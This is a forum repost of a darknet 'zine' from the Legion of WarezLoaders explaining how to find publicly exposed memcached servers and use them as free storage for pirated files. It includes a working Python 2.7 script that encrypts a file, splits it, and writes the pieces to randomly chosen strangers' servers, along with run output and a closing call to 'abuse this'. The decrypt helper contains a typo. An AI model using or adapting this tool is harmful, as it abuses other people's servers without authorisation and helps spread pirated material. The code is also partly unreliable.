03-01-2018, 04:31 AM
Zine: Exploiting Public Memcached Servers for free decentralized encrypted storage
This is a zine I found on the darknet not too long ago. No credits to me, I did not write this.
Credits: the Legion of WarezLoaders
http://warezlrg54cefgmp.onion/tgol/zines...torage.txt
Code [Expanded]:
[~Legion of WarezLoaders~]
█ █░ ▄▄▄ ██▀███ ▓█████ ▒███████▒ ██▓ ▒█████ ▄▄▄ ▓█████▄ ▓█████ ██▀███
▓█░ █ ░█░▒████▄ ▓██ ▒ ██▒▓█ ▀ ▒ ▒ ▒ ▄▀░▓██▒ ▒██▒ ██▒▒████▄ ▒██▀ ██▌▓█ ▀ ▓██ ▒ ██▒
▒█░ █ ░█ ▒██ ▀█▄ ▓██ ░▄█ ▒▒███ ░ ▒ ▄▀▒░ ▒██░ ▒██░ ██▒▒██ ▀█▄ ░██ █▌▒███ ▓██ ░▄█ ▒
░█░ █ ░█ ░██▄▄▄▄██ ▒██▀▀█▄ ▒▓█ ▄ ▄▀▒ ░▒██░ ▒██ ██░░██▄▄▄▄██ ░▓█▄ ▌▒▓█ ▄ ▒██▀▀█▄
░░██▒██▓ ▓█ ▓██▒░██▓ ▒██▒░▒████▒▒███████▒░██████▒░ ████▓▒░ ▓█ ▓██▒░▒████▓ ░▒████▒░██▓ ▒██▒
░ ▓░▒ ▒ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░░ ▒░ ░░▒▒ ▓░▒░▒░ ▒░▓ ░░ ▒░▒░▒░ ▒▒ ▓▒█░ ▒▒▓ ▒ ░░ ▒░ ░░ ▒▓ ░▒▓░
▒ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ░ ░░░▒ ▒ ░ ▒░ ░ ▒ ░ ░ ▒ ▒░ ▒ ▒▒ ░ ░ ▒ ▒ ░ ░ ░ ░▒ ░ ▒░
░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ▒ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
a cached memory zine
In this zine The Legion of WarezLoaders takes advantage of public db's and creates a decentralized encrypted backup system.
What is this? decentralization storage without a ethereum erc20 token? yes you actually can code without using the blockchain in 2018.
keybased db they get more and more popular for each day they run crypto currencies and other various backends.
We decided to target the db/storage memecached due to its lack of default security.
implementing something like this without using a firewall or similar is just like saying "Hey Legion of WarezLoaders! Come in!" and we are coming
We actually looked into memecached for inspiration for temporary storing various things while WL was created but we went with not using the code structure they use and went with creating our own for encryption and permanently deleting the data that is being cached.
Memcached is what:
Memcached is an in-memory key-value store for small chunks of arbitrary data (strings, objects) from results of database calls, API calls, or page rendering. according to -> https://www.memcached.org/, More : https://en.wikipedia.org/wiki/Memcached
memecached is also not overly exploited like various other protocols/services so a fun protocol to play with.
Quote:port: 11211
active: over 85k
Good 2 know:
storing values larger then 1MB requires special settings so lets safe-card and not do that
it runs in memory == reboot and ur data is gone, restart the service and its gone etc etc..
"Forgetting is a Feature" https://github.com/memcached/memcached/wiki/Overview
useful stuff: https://github.com/memcached/memcached/b...otocol.txt
Choose a language:
Python2.7 - simple, easy 2 write and we basically just need to index the boxes and create sockets
Create:
index alot of memcached servers that use port 11211(verify ur servers by telneting/netcating in and running "stats" to get a valid response so that we dont have any non-memcached sys) -> code a the client that encrypts and uploads the file
[0]scan
after some scanning we where able to detect how much data we can use using regexing and some scripting we where shocked by the result we got
Quote:# python find_amount.py
Collected file storage volym:239807960768784.878748 MB
that is an insane amount of storage just waiting to be used
we are talking 239807.96 Petabytes of unused storage
in this script we just read what STAT limit_maxbytes is set to on all systems
[1]Warez client
We gotta store em warez right?
Overview:
memecached got a simple api using tcp socket just store the data using the 'set' and get the data with 'get' and throw in some '\r\n'.
a good thing to keep in mind is that this is a great way to store temporary files and not
ur one copy of the backup, however we do disable the limit on all files so all files should be saved until the memcached daemon is rebooted/reloaded
we also want some crypto which is gonna make our data bigger unless we use a stream cipher but lets go with scrypt and split the data up between different servers.
we want a list of servers that run memecached in a .txt file so that we can randomly select one to use
code:
Code:
--Start--
import random, scrypt, sys, os
import socket, re
port = 11211
th3file = open('boxes.txt').read().split()
print len(th3file), ' amount of servers'
myfile = sys.argv[1]
socketn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'picking out some random server'
random.shuffle(th3file)
tempsys = th3file[len(th3file)/2:]
print 'Give me a passwd so i can encrypt the file'
mypass = raw_input('Password: ')
print 'encrypting file'
cryptic = scrypt.encrypt(open(myfile, 'rb').read(), mypass, maxtime=1.0).encode('base64').replace('\n', '')
print 'file has been encrypted'
def decrypt_file(passwd,data):#just throwing in this function for ease of use
return scypt.decrypt(data, passwd, maxtime=1.0)
def send_the_data(boxkey, data, server):
socketn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketn.settimeout(10)
try:
socketn.connect((server, port))
wareztext = 'set {} 1 0 {}\r\n{}\r\n'.format(boxkey, len(data), data) #by defining 0 we dont wont it to be removed(no time limit), we could use it as a "temporary anonymous saving system" by setting an expire time either in seconds or in good old unix
socketn.sendall(wareztext)
responsedata = socketn.recv(2048)
socketn.close()
return responsedata
except Exception:
print 'could not connect to: ', server
return True
def get_the_data(boxkey, server):#for later
socketn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketn.connect((server, port))
wareztext = 'get {} \r\n'.format(boxkey)
socketn.sendall(wareztext)
responsedata = socketn.recv(2048)
socketn.close()
if 'VALUE' in responsedata:
regexmagic = 'VALUE\s{}.*\r\n(.*)\r\n'.format(boxkey)
responsedata = re.findall(regexmagic, responsedata)[0]#\\
return responsedata
def check_out(server):#for later
try:
socketn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketn.connect((server , 11211))
socketn.sendall('stats\r\n')
reply = socketn.recv(2048)
mb = re.findall(r'STAT\slimit_maxbytes\s(.*)\r', reply)[0]
socketn.close()
except Exception:
return ('cant connect..', 0)
return (reply, mb)
slice1 = cryptic[len(cryptic)/2:]
slice0 = cryptic[:len(cryptic)/2]
print 'data has been sliced into 2 parts'
print 'uploading the data'
for serv in tempsys:
randkey0 = os.urandom(37).encode('base64').replace('\n', '').replace('=', '')
randkey1 = os.urandom(37).encode('base64').replace('\n', '').replace('=', '')
print 'Remember remember: ', (randkey0, randkey1, serv)
send_the_data(randkey0,slice0,serv)
send_the_data(randkey1,slice1,serv)
print 'both slices sent'
print 'data has been uploaded to ', len(tempsys), ' amount of servers'[2]: run
Code:
#cat loot.txt |uniq | head -n8 > boxes.txt
#echo 'blabla' > test.txt
#python script.py test.txt8 amount of servers
picking out some random server
Give me a passwd so i can encrypt the file
Password: testing..
encrypting file
file has been encrypted
data has been sliced into 2 parts
uploading the data
Remember remember : ('UlN7uWLbOB3xKII4a1bi6ylzPgtyGE6dhddEaZTukjJ9sjMGaw', 'KF+HnJDnN5YHRKNoQUwQfUSmv8iR+TREQvjEjc4J7v9Gi2ET5g', 'dont.run.memecache.public')
both slices sent
Remember remember: ('B081/TCL5DY8fFIdZ7SRXJp3HRcZW0UfabpJLreufDp67FMkHw', '+ZAPAnkTpz2w/Uo9bVxATWCMGNaMur1/3s5dcxh33wOxxkOh9Q', 'dont.run.memecache.public')
both slices sent
Remember remember: ('g6nakHYNcbv6N9R3I9snQVycZ7lZz+IT/I5+s/jopzV2z1pifQ', 'fngnM4/ffJSPrh3ZjZxOCBkB9mBCVYrOr6Lj4e27cZIHKC2SZQ', 'dont.run.memecache.public')
both slices sent
Remember remember: ('ep2koPWKCmEh5Ow7+ZiJ4GLSyGpL8ilQk0jNShfszN049UqJmQ', '4Ld1hXYjuBfTduo8R3IeaQoWTC1BhTnK+nus20KRfAvn7pVhpA', 'dont.run.memecache.public')
both slices sent
data has been uploaded to 4 amount of servers
[3]: abuse this and create ur own stuff
*/
CopyLeft the Legion of WarezLoaders
This zine must be distrubted.
This zine must be pirated.
This zine is not allowed to be sold.
Any use of this zine that is not illegal is not permitted.
By using this code and ezine in any sort of way.
You agree to that Katherine Forrest is
responsible for all warranty and misuse of this zine.
/*
~Warezloader the one and only real marketplace
http://warezlrg54cefgmp.onion/tgol/zines...torage.txt